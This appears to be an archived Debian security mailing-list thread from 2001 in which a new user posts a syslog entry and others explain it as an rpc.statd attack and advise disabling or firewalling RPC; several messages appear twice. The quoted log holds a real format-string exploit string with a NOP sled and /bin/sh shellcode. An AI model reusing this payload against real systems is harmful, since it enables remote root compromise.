Re: strange log entry
On Thu, May 24, 2001 at 05:30:14AM -0800, Ethan Benson wrote: On Thu, May 24, 2001 at 05:41:08AM -0700, Jacob Meuser wrote: On Thu, May 24, 2001 at 04:06:08AM -0800, Ethan Benson wrote: On Thu, May 24, 2001 at 04:50:57AM -0700, Jacob Meuser wrote: BS, when was the last time you installed OpenBSD? I just did an install 2.5 That was what, 2 years ago? 1.5 years or so yes, i haven't messed with openbsd in a while, i was going to use it for my firewall but there were some problems with it so i ditched in favor of debian. OpenBSD's security reputation is a bit exaggerated, with some good admining a linux box can be just as secure... True, proper administration is more important to security than what OS is run. To some degree, OpenBSD's reputation may be somewhat exaggerated, but they do actively smash bugs, and correct problems in OpenSource code. They're also the people behind OpenSSH, so that adds to the hype a bit. i was also quite annoyed by its complete lack of upgradability, i tried twice in testing to upgrade the dist from one version to another it failed and made a mess every time, screw that i don't think much of rebuilding a box every 6mo - 1 year just to keep up with the times. I just upgraded a server and a firewall/router using the standard upgrade procedures. I had no problems. It's true that there's nothing like 'apt-get upgrade', but, at least in my experience, less than an hour every six months is a reasonable amount of time to spend upgrading. Ah, they probably caught the problem shortly before 2.6 release, and didn't have time to fix ftp code, but changing rc.conf was doable. heh your almost as cynical as i am ;-) I like to call it practical ;) Anyway, as of 2.9, portmap, rstatd, ruserd, time, daytime, comsat, sshd and identd are enabled by default. hmm maybe my memory is funky but that seems like more then i saw out of the box... it still had more crap running then i prefer. Yes, you should always disable things you don't use. That's one thing I like about OpenBSD, they assume you're not goung to use much, and if you are, then you should know how to enable it. There's no point in starting a service before you've had a chance to look at the config file. Like I said, I didn't want to start a discussion about OpenBSD vs Linux, I have seen posts from you saying that you like some features of OpenBSD, /sbin/nologin for example. its a nice system, i like the simplicity and clean design, its like debian in that. but upgrading the whole thing is simply impossible. well maybe grabbing all source from CVS and doing make world will do it, but i didn't try it. the `official' upgrade system is broken. I'm just curious why the 'r' tools are apparently so vulnerable in Linux. If the OpenBSD folks are willing to risk creditability by claiming that their default install has no remote holes, while enabling portmap and rstatd by default, why can't Linux users feel safe running those daemons also? well openbsd claims to have audited everything they enable by default, and everything in their base install (which is VERY lean). from I have to disagree with this. Sure you don't get zope, but you get sendmail, bind, apache, perl, gcc, lynx, ftpd, ftp, ppp, pppd, sh, ksh, csh, egrep, sed, less, more, vi, ed, ex, mg ... Pretty much everything you need, if not the most extravagant. Oh yeah, and X also. The main difference, IMHO, is that OpenBSD is more current than Debian, or just about any stable distro. Look what's in 2.9 - http://www.openbsd.org/29.html reading bugtraq they seem to have a very bad habit about fixing bugs quietly and not bothering to send patches upstream, instead posting sarcastic messages along the lines of `oh yeah we fixed that in CVS 3 years ago' (check out the recent joe DEADJOE vulnerabity for an example). Well, you /could/ just check their sources. They're on the web you know. http://www.openbsd.org/cgi-bin/cvsweb/ They're published in public, what more do you really want? It's pretty easy to find out when and who made changes to a CVS repo, and they're pretty particular about proper Changelogs. of course i could be wrong, and all upstream developers are just blackholing openbsd security patches. Well, to some degree this may be true. Sometimes the OpenBSD developers, Theo de Raadt in particular, kind of come off as rude and pretentious. Just check the misc@openbsd mailing list archives for some entertaining flames :) [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: strange log entry
On Fri, May 25, 2001 at 01:55:35AM -0700, Jacob Meuser wrote: Well, you /could/ just check their sources. They're on the web you know. http://www.openbsd.org/cgi-bin/cvsweb/ They're published in public, what more do you really want? It's pretty easy to find out when and who made changes to a CVS repo, and they're pretty particular about proper Changelogs. yes and how many distros/OSes, and other possible places are there where a given peice of Free software is living in CVS, having bugs fixed. can you really expect the upstream maintainer to spend all there time running around checking changelogs and cvs diffs of x many different CVS repos? do you really expect some upstream maintainer to regularly check all changes to his program in: OpenBSD's CVS FreeBSD's CVS NetBSD's CVS Redhat's rpm patches Mandrake's rpm patches Debian's patches ... ... ... ... i suspect they don't have time for that. when debian fixes a serious bug in a package they send the patch upstream, its just common courtesy. a courtesy OpenBSD seems to lack, but then that gives them an edge and opertunity to brag when the bug is found by everyone else eventually. Well, to some degree this may be true. Sometimes the OpenBSD developers, Theo de Raadt in particular, kind of come off as rude and pretentious. Just check the misc@openbsd mailing list archives for some entertaining flames :) oh i am well aware of Theo's legendary reputation for being a complete bastard, but i don't really think the samba maintainer is going to leave a security hole unpatched just because Theo has an abrasive personality... -- Ethan Benson http://www.alaska.net/~erbenson/ PGP signature
Re: strange log entry
On Thu, May 24, 2001 at 05:30:14AM -0800, Ethan Benson wrote: On Thu, May 24, 2001 at 05:41:08AM -0700, Jacob Meuser wrote: On Thu, May 24, 2001 at 04:06:08AM -0800, Ethan Benson wrote: On Thu, May 24, 2001 at 04:50:57AM -0700, Jacob Meuser wrote: BS, when was the last time you installed OpenBSD? I just did an install 2.5 That was what, 2 years ago? 1.5 years or so yes, i haven't messed with openbsd in a while, i was going to use it for my firewall but there were some problems with it so i ditched in favor of debian. OpenBSD's security reputation is a bit exaggerated, with some good admining a linux box can be just as secure... True, proper administration is more important to security than what OS is run. To some degree, OpenBSD's reputation may be somewhat exaggerated, but they do actively smash bugs, and correct problems in OpenSource code. They're also the people behind OpenSSH, so that adds to the hype a bit. i was also quite annoyed by its complete lack of upgradability, i tried twice in testing to upgrade the dist from one version to another it failed and made a mess every time, screw that i don't think much of rebuilding a box every 6mo - 1 year just to keep up with the times. I just upgraded a server and a firewall/router using the standard upgrade procedures. I had no problems. It's true that there's nothing like 'apt-get upgrade', but, at least in my experience, less than an hour every six months is a reasonable amount of time to spend upgrading. Ah, they probably caught the problem shortly before 2.6 release, and didn't have time to fix ftp code, but changing rc.conf was doable. heh your almost as cynical as i am ;-) I like to call it practical ;) Anyway, as of 2.9, portmap, rstatd, ruserd, time, daytime, comsat, sshd and identd are enabled by default. hmm maybe my memory is funky but that seems like more then i saw out of the box... it still had more crap running then i prefer. Yes, you should always disable things you don't use. That's one thing I like about OpenBSD, they assume you're not goung to use much, and if you are, then you should know how to enable it. There's no point in starting a service before you've had a chance to look at the config file. Like I said, I didn't want to start a discussion about OpenBSD vs Linux, I have seen posts from you saying that you like some features of OpenBSD, /sbin/nologin for example. its a nice system, i like the simplicity and clean design, its like debian in that. but upgrading the whole thing is simply impossible. well maybe grabbing all source from CVS and doing make world will do it, but i didn't try it. the `official' upgrade system is broken. I'm just curious why the 'r' tools are apparently so vulnerable in Linux. If the OpenBSD folks are willing to risk creditability by claiming that their default install has no remote holes, while enabling portmap and rstatd by default, why can't Linux users feel safe running those daemons also? well openbsd claims to have audited everything they enable by default, and everything in their base install (which is VERY lean). from I have to disagree with this. Sure you don't get zope, but you get sendmail, bind, apache, perl, gcc, lynx, ftpd, ftp, ppp, pppd, sh, ksh, csh, egrep, sed, less, more, vi, ed, ex, mg ... Pretty much everything you need, if not the most extravagant. Oh yeah, and X also. The main difference, IMHO, is that OpenBSD is more current than Debian, or just about any stable distro. Look what's in 2.9 - http://www.openbsd.org/29.html reading bugtraq they seem to have a very bad habit about fixing bugs quietly and not bothering to send patches upstream, instead posting sarcastic messages along the lines of `oh yeah we fixed that in CVS 3 years ago' (check out the recent joe DEADJOE vulnerabity for an example). Well, you /could/ just check their sources. They're on the web you know. http://www.openbsd.org/cgi-bin/cvsweb/ They're published in public, what more do you really want? It's pretty easy to find out when and who made changes to a CVS repo, and they're pretty particular about proper Changelogs. of course i could be wrong, and all upstream developers are just blackholing openbsd security patches. Well, to some degree this may be true. Sometimes the OpenBSD developers, Theo de Raadt in particular, kind of come off as rude and pretentious. Just check the [EMAIL PROTECTED] mailing list archives for some entertaining flames :) [EMAIL PROTECTED]
Re: strange log entry
On Fri, May 25, 2001 at 01:55:35AM -0700, Jacob Meuser wrote: Well, you /could/ just check their sources. They're on the web you know. http://www.openbsd.org/cgi-bin/cvsweb/ They're published in public, what more do you really want? It's pretty easy to find out when and who made changes to a CVS repo, and they're pretty particular about proper Changelogs. yes and how many distros/OSes, and other possible places are there where a given peice of Free software is living in CVS, having bugs fixed. can you really expect the upstream maintainer to spend all there time running around checking changelogs and cvs diffs of x many different CVS repos? do you really expect some upstream maintainer to regularly check all changes to his program in: OpenBSD's CVS FreeBSD's CVS NetBSD's CVS Redhat's rpm patches Mandrake's rpm patches Debian's patches ... ... ... ... i suspect they don't have time for that. when debian fixes a serious bug in a package they send the patch upstream, its just common courtesy. a courtesy OpenBSD seems to lack, but then that gives them an edge and opertunity to brag when the bug is found by everyone else eventually. Well, to some degree this may be true. Sometimes the OpenBSD developers, Theo de Raadt in particular, kind of come off as rude and pretentious. Just check the [EMAIL PROTECTED] mailing list archives for some entertaining flames :) oh i am well aware of Theo's legendary reputation for being a complete bastard, but i don't really think the samba maintainer is going to leave a security hole unpatched just because Theo has an abrasive personality... -- Ethan Benson http://www.alaska.net/~erbenson/ pgpiD4FGZrPht.pgp Description: PGP signature
Re: strange log entry
Yep, it's a security problem. Someone is trying to hack into your system using one of many known security bugs in the rpc daemon. If you don't need the rpc stuff running, then just disable it (better yet, uninstall it). If you really do need it running, but it's only used locally, then I suggest you use ipchains to drop any packets targeted to port 111. But best is to simply remove it entirely. --- Wade On Thu, 24 May 2001 05:07:33 GMT, [EMAIL PROTECTED] writes: Heya :) I was running a 'tail -f' on my /var/log/messages and this entry appeared whil e I was connected to the internet: May 24 10:08:11 noogies -- MARK -- May 24 10:20:34 noogies May 24 10:20:34 noogies /sbin/rpc.statd[151]: gethostbyname error for ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n %137x%n%10x%n%192x%n\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20 May 24 10:20:34 noogies Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^AÍ\200è\177ÿÿÿ and it has me worried it may be a security issue. I'm very new to linux, and newer again to debian, and at this stage I really don't have a clue as to what the above log entry is trying to tell me... Any input or comments would be very appreciated :) Thank you - trevs -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] -- /\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \ / ASCII Ribbon Campaign| Wade Richards --- [EMAIL PROTECTED] X - NO HTML/RTF in e-mail | Fight SPAM! Join CAUCE. / \ - NO Word docs in e-mail | See http://www.cauce.org/ for details. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: strange log entry
On Thu, May 24, 2001 at 04:10:13PM +0900, Curt Howland wrote: the last two i understand, as well as domain, but sunrpc and 1171? man fuser. Look for the -n option. i've cleaned up everything i can think of, but X11R6 says it still needs the RPC packages. Why does/would X11 require RPC? -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: strange log entry
On Thu, May 24, 2001 at 01:24:50AM -0400, Ed Street wrote: Hello, Well first off WHY are you running the rpc stuff? (i.e. I can root a redhat 6.x box in under 30 seconds with a rpc exploit from a clean install) Turn that stuff OFF. Not to start a thread discussing OSes, but ... OpenBSD ships with rstatd and ruserd enabled by default and according to http://www.openbsd.org/ Four years without a remote hole in the default install! Which begs the question, especially since the *BSD's release their sources under BSD style liscenses, why does rpc remain a security problem in Linux? Is it the kernel? Is it the rpc code? Simply curious, [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: strange log entry
On Thu, May 24, 2001 at 04:50:57AM -0700, Jacob Meuser wrote: BS, when was the last time you installed OpenBSD? I just did an install 2.5 today. I guarantee portmap, ruserd, and rstatd are enabled by default, as the installer doesn't even ask what you want to activate, and these programs are part of the base tarball. in 2.5 ftpd, portmap, smtp, and identd were open, i am pretty sure rstatd was not. 2.6 i think disabled ftpd by default, shortly thereafter a root hole was found in openbsd's ftpd and they prompty said `ftpd is not enabled in the default install of 2.6 (or whatever) and thus there is no root hole in our default install' -- Ethan Benson http://www.alaska.net/~erbenson/ PGP signature
Re: strange log entry
On Thu, May 24, 2001 at 01:34:01AM -0700, Jacob Meuser wrote: OpenBSD ships with rstatd and ruserd enabled by default and according to http://www.openbsd.org/ Four years without a remote hole in the default install! Which begs the question, especially since the *BSD's release their sources under BSD style liscenses, why does rpc remain a security problem in Linux? Is it the kernel? Is it the rpc code? This is not the same stuff at all. They ship with rstatd turned on, not rpc.statd. They are completely different. rpc.statd is used by nfs. rstatd is used by the rstat program, which tells you info about machines on your network. It is like running 'uptime' on all your machines at once. noah -- ___ | Web: http://web.morgul.net/~frodo/ | PGP Public Key: http://web.morgul.net/~frodo/mail.html PGP signature
RE: strange log entry
Hello, that's simple ;) If they was stable/non-exploitable then we'd be using rpc inplace of ssh ;) Ed -Original Message- From: Jacob Meuser [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 24, 2001 8:41 AM To: [EMAIL PROTECTED] Subject: Re: strange log entry On Thu, May 24, 2001 at 04:06:08AM -0800, Ethan Benson wrote: On Thu, May 24, 2001 at 04:50:57AM -0700, Jacob Meuser wrote: BS, when was the last time you installed OpenBSD? I just did an install 2.5 That was what, 2 years ago? today. I guarantee portmap, ruserd, and rstatd are enabled by default, as the installer doesn't even ask what you want to activate, and these programs are part of the base tarball. in 2.5 ftpd, portmap, smtp, and identd were open, i am pretty sure rstatd was not. 2.6 i think disabled ftpd by default, shortly thereafter a root hole was found in openbsd's ftpd and they prompty said `ftpd is not enabled in the default install of 2.6 (or whatever) and thus there is no root hole in our default install' Ah, they probably caught the problem shortly before 2.6 release, and didn't have time to fix ftp code, but changing rc.conf was doable. Anyway, as of 2.9, portmap, rstatd, ruserd, time, daytime, comsat, sshd and identd are enabled by default. Like I said, I didn't want to start a discussion about OpenBSD vs Linux, I have seen posts from you saying that you like some features of OpenBSD, /sbin/nologin for example. I'm just curious why the 'r' tools are apparently so vulnerable in Linux. If the OpenBSD folks are willing to risk creditability by claiming that their default install has no remote holes, while enabling portmap and rstatd by default, why can't Linux users feel safe running those daemons also? [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: strange log entry
On Thu, May 24, 2001 at 07:33:44AM +, Jim Breton wrote: On Thu, May 24, 2001 at 04:10:13PM +0900, Curt Howland wrote: the last two i understand, as well as domain, but sunrpc and 1171? man fuser. Look for the -n option. ... or look for -p option of netstat :) Mirek -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
strange log entry
Heya :) I was running a 'tail -f' on my /var/log/messages and this entry appeared while I was connected to the internet: May 24 10:08:11 noogies -- MARK -- May 24 10:20:34 noogies May 24 10:20:34 noogies /sbin/rpc.statd[151]: gethostbyname error for ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 May 24 10:20:34 noogies Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^AÍ\200è\177ÿÿÿ and it has me worried it may be a security issue. I'm very new to linux, and newer again to debian, and at this stage I really don't have a clue as to what the above log entry is trying to tell me... Any input or comments would be very appreciated :) Thank you - trevs
RE: strange log entry
Hello, Well first off WHY are you running the rpc stuff? (i.e. I can root a redhat 6.x box in under 30 seconds with a rpc exploit from a clean install) Turn that stuff OFF. Ed -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Sent: Thursday, May 24, 2001 1:08 AM To: debian-security@lists.debian.org Subject: strange log entry Heya :) I was running a 'tail -f' on my /var/log/messages and this entry appeared while I was connected to the internet: May 24 10:08:11 noogies -- MARK -- May 24 10:20:34 noogies May 24 10:20:34 noogies /sbin/rpc.statd[151]: gethostbyname error for ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%1 37x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220 May 24 10:20:34 noogies Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^AÍ\200è\177ÿÿÿ and it has me worried it may be a security issue. I'm very new to linux, and newer again to debian, and at this stage I really don't have a clue as to what the above log entry is trying to tell me... Any input or comments would be very appreciated :) Thank you - trevs -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: strange log entry
Yep, it's a security problem. Someone is trying to hack into your system using one of many known security bugs in the rpc daemon. If you don't need the rpc stuff running, then just disable it (better yet, uninstall it). If you really do need it running, but it's only used locally, then I suggest you use ipchains to drop any packets targeted to port 111. But best is to simply remove it entirely. --- Wade On Thu, 24 May 2001 05:07:33 GMT, [EMAIL PROTECTED] writes: Heya :) I was running a 'tail -f' on my /var/log/messages and this entry appeared whil e I was connected to the internet: May 24 10:08:11 noogies -- MARK -- May 24 10:20:34 noogies May 24 10:20:34 noogies /sbin/rpc.statd[151]: gethostbyname error for ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n %137x%n%10x%n%192x%n\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20 May 24 10:20:34 noogies Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^AÍ\200è\177ÿÿÿ and it has me worried it may be a security issue. I'm very new to linux, and newer again to debian, and at this stage I really don't have a clue as to what the above log entry is trying to tell me... Any input or comments would be very appreciated :) Thank you - trevs -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] -- /\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \ / ASCII Ribbon Campaign| Wade Richards --- [EMAIL PROTECTED] X - NO HTML/RTF in e-mail | Fight SPAM! Join CAUCE. / \ - NO Word docs in e-mail | See http://www.cauce.org/ for details.
Re: strange log entry
On Wed, May 23, 2001 at 10:58:43PM -0700, Wade Richards wrote: Yep, it's a security problem. Someone is trying to hack into your system using one of many known security bugs in the rpc daemon. If you don't need the rpc stuff running, then just disable it (better yet, uninstall it). If you really do need it running, but it's only used locally, then I suggest you use ipchains to drop any packets targeted to port 111. But best is to simply remove it entirely. That only blocks portmap. Other UDP services can be found with a UDP port scan by e.g. nmap. -- #define X(x,y) x##y Peter Cordes ; e-mail: X([EMAIL PROTECTED] , ns.ca) The gods confound the man who first found out how to distinguish the hours! Confound him, too, who in this place set up a sundial, to cut and hack my day so wretchedly into small pieces! -- Plautus, 200 BCE
Re: strange log entry
Definitely a security problem. But the fact that you actually saw something is good news .. it means the exploit didn't work. If it had worked, the thing would just die quietly and not log anything. Better off without rpc anyway, unless you *need* it for NFS or something similar. And if you really need it, make sure it's firewalled. I get about 30 similar rpc.statd scans every day on most of my machines. Glad they're not running rpc.statd :) --Henry On Thu, 24 May 2001 [EMAIL PROTECTED] wrote: Heya :) I was running a 'tail -f' on my /var/log/messages and this entry appeared while I was connected to the internet: May 24 10:08:11 noogies -- MARK -- May 24 10:20:34 noogies May 24 10:20:34 noogies /sbin/rpc.statd[151]: gethostbyname error for ^X???^X???^Y???^Y???^Z???^Z???^[???^[???%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 May 24 10:20:34 noogies ?^F/bin?F^D/shA0?\210F^G\211v^L\215V^P\215N^L\211??^K?\200?^A?\200?\177??? and it has me worried it may be a security issue. I'm very new to linux, and newer again to debian, and at this stage I really don't have a clue as to what the above log entry is trying to tell me... Any input or comments would be very appreciated :) Thank you - trevs -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: strange log entry
On Thu, May 24, 2001 at 01:24:50AM -0400, Ed Street wrote: Hello, Well first off WHY are you running the rpc stuff? (i.e. I can root a redhat 6.x box in under 30 seconds with a rpc exploit from a clean install) Turn that stuff OFF. Not to start a thread discussing OSes, but ... OpenBSD ships with rstatd and ruserd enabled by default and according to http://www.openbsd.org/ Four years without a remote hole in the default install! Which begs the question, especially since the *BSD's release their sources under BSD style liscenses, why does rpc remain a security problem in Linux? Is it the kernel? Is it the rpc code? Simply curious, [EMAIL PROTECTED]
Re: strange log entry
On Thu, May 24, 2001 at 01:34:01AM -0700, Jacob Meuser wrote: On Thu, May 24, 2001 at 01:24:50AM -0400, Ed Street wrote: Hello, Well first off WHY are you running the rpc stuff? (i.e. I can root a redhat 6.x box in under 30 seconds with a rpc exploit from a clean install) Turn that stuff OFF. Not to start a thread discussing OSes, but ... OpenBSD ships with rstatd and ruserd enabled by default and according to http://www.openbsd.org/ Four years without a remote hole in the default install! Which begs the question, especially since the *BSD's release their sources under BSD style liscenses, why does rpc remain a security problem in Linux? Is it the kernel? Is it the rpc code? because that underlined portion is the key here, OpenBSD keeps the rpc stuff turned off by default, thus even if a root hole is found in a rpc service (other then portmap) openbsd does not consider that a `remote hole in the *default install*' they are quick to mention this every time a hole is found in any daemon OpenBSD ships with but leaves off by default. -- Ethan Benson http://www.alaska.net/~erbenson/ pgpNKsDqtt4Is.pgp Description: PGP signature
Re: strange log entry
On Thu, May 24, 2001 at 12:43:40AM -0800, Ethan Benson wrote: On Thu, May 24, 2001 at 01:34:01AM -0700, Jacob Meuser wrote: On Thu, May 24, 2001 at 01:24:50AM -0400, Ed Street wrote: Hello, Well first off WHY are you running the rpc stuff? (i.e. I can root a redhat 6.x box in under 30 seconds with a rpc exploit from a clean install) Turn that stuff OFF. Not to start a thread discussing OSes, but ... OpenBSD ships with rstatd and ruserd enabled by default and according to http://www.openbsd.org/ Four years without a remote hole in the default install! Which begs the question, especially since the *BSD's release their sources under BSD style liscenses, why does rpc remain a security problem in Linux? Is it the kernel? Is it the rpc code? because that underlined portion is the key here, OpenBSD keeps the rpc stuff turned off by default, thus even if a root hole is found in a rpc service (other then portmap) openbsd does not consider that a `remote hole in the *default install*' they are quick to mention this every time a hole is found in any daemon OpenBSD ships with but leaves off by default. BS, when was the last time you installed OpenBSD? I just did an install today. I guarantee portmap, ruserd, and rstatd are enabled by default, as the installer doesn't even ask what you want to activate, and these programs are part of the base tarball. [EMAIL PROTECTED]
Re: strange log entry
On Thu, May 24, 2001 at 04:50:57AM -0700, Jacob Meuser wrote: BS, when was the last time you installed OpenBSD? I just did an install 2.5 today. I guarantee portmap, ruserd, and rstatd are enabled by default, as the installer doesn't even ask what you want to activate, and these programs are part of the base tarball. in 2.5 ftpd, portmap, smtp, and identd were open, i am pretty sure rstatd was not. 2.6 i think disabled ftpd by default, shortly thereafter a root hole was found in openbsd's ftpd and they prompty said `ftpd is not enabled in the default install of 2.6 (or whatever) and thus there is no root hole in our default install' -- Ethan Benson http://www.alaska.net/~erbenson/ pgpb9SYUDuSVF.pgp Description: PGP signature
Re: strange log entry
On Thu, May 24, 2001 at 04:06:08AM -0800, Ethan Benson wrote: On Thu, May 24, 2001 at 04:50:57AM -0700, Jacob Meuser wrote: BS, when was the last time you installed OpenBSD? I just did an install 2.5 That was what, 2 years ago? today. I guarantee portmap, ruserd, and rstatd are enabled by default, as the installer doesn't even ask what you want to activate, and these programs are part of the base tarball. in 2.5 ftpd, portmap, smtp, and identd were open, i am pretty sure rstatd was not. 2.6 i think disabled ftpd by default, shortly thereafter a root hole was found in openbsd's ftpd and they prompty said `ftpd is not enabled in the default install of 2.6 (or whatever) and thus there is no root hole in our default install' Ah, they probably caught the problem shortly before 2.6 release, and didn't have time to fix ftp code, but changing rc.conf was doable. Anyway, as of 2.9, portmap, rstatd, ruserd, time, daytime, comsat, sshd and identd are enabled by default. Like I said, I didn't want to start a discussion about OpenBSD vs Linux, I have seen posts from you saying that you like some features of OpenBSD, /sbin/nologin for example. I'm just curious why the 'r' tools are apparently so vulnerable in Linux. If the OpenBSD folks are willing to risk creditability by claiming that their default install has no remote holes, while enabling portmap and rstatd by default, why can't Linux users feel safe running those daemons also? [EMAIL PROTECTED]
Re: strange log entry
